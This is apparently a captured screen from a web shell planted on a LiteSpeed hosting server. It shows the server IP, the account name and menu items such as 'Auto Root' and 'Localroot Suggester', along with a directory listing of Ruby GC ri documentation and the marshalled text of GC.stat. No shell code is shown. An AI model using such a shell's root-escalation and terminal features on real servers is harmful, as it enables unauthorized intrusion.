Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby21 /
share /
ri /
2.1.0 /
system /
GC /
Delete
Unzip
Name
Size
Permission
Date
Action
Profiler
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
cdesc-GC.ri
1.11
KB
-rw-r--r--
2023-07-26 17:52
count-c.ri
416
B
-rw-r--r--
2023-07-26 17:52
disable-c.ri
509
B
-rw-r--r--
2023-07-26 17:52
enable-c.ri
538
B
-rw-r--r--
2023-07-26 17:52
garbage_collect-i.ri
974
B
-rw-r--r--
2023-07-26 17:52
latest_gc_info-c.ri
450
B
-rw-r--r--
2023-07-26 17:52
malloc_allocated_size-c.ri
475
B
-rw-r--r--
2023-07-26 17:52
malloc_allocations-c.ri
460
B
-rw-r--r--
2023-07-26 17:52
start-c.ri
955
B
-rw-r--r--
2023-07-26 17:52
stat-c.ri
1.37
KB
-rw-r--r--
2023-07-26 17:52
stress%3d-c.ri
564
B
-rw-r--r--
2023-07-26 17:52
stress-c.ri
335
B
-rw-r--r--
2023-07-26 17:52
verify_internal_consistency-c.ri
547
B
-rw-r--r--
2023-07-26 17:52
Save
Rename
U:RDoc::AnyMethod[iI" stat:ETI" GC::stat;TT:publico:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"8Returns a Hash containing information about the GC.;To:RDoc::Markup::BlankLine o; ; [I"NThe hash includes information about internal statistics about GC such as:;T@o:RDoc::Markup::Verbatim; [I"{ ;TI" :count=>2, ;TI" :heap_used=>9, ;TI" :heap_length=>11, ;TI" :heap_increment=>2, ;TI" :heap_live_slot=>6836, ;TI" :heap_free_slot=>519, ;TI" :heap_final_slot=>0, ;TI" :heap_swept_slot=>818, ;TI"( :total_allocated_object=>7674, ;TI"# :total_freed_object=>838, ;TI"# :malloc_increase=>181034, ;TI"" :malloc_limit=>16777216, ;TI" :minor_gc_count=>2, ;TI" :major_gc_count=>0, ;TI"' :remembered_shady_object=>55, ;TI", :remembered_shady_object_limit=>0, ;TI" :old_object=>2422, ;TI" :old_object_limit=>0, ;TI"& :oldmalloc_increase=>277386, ;TI"$ :oldmalloc_limit=>16777216 ;TI"} ;T:@format0o; ; [I"PThe contents of the hash are implementation specific and may be changed in ;TI"the future.;T@o; ; [I"4This method is only expected to work on C Ruby.;T: @fileI" gc.c;T:0@omit_headings_from_table_of_contents_below0I"DGC.stat -> Hash GC.stat(hash) -> hash GC.stat(:key) -> Numeric ;T0[ I"(p1 = v1);T@1FI"GC;TcRDoc::NormalModule00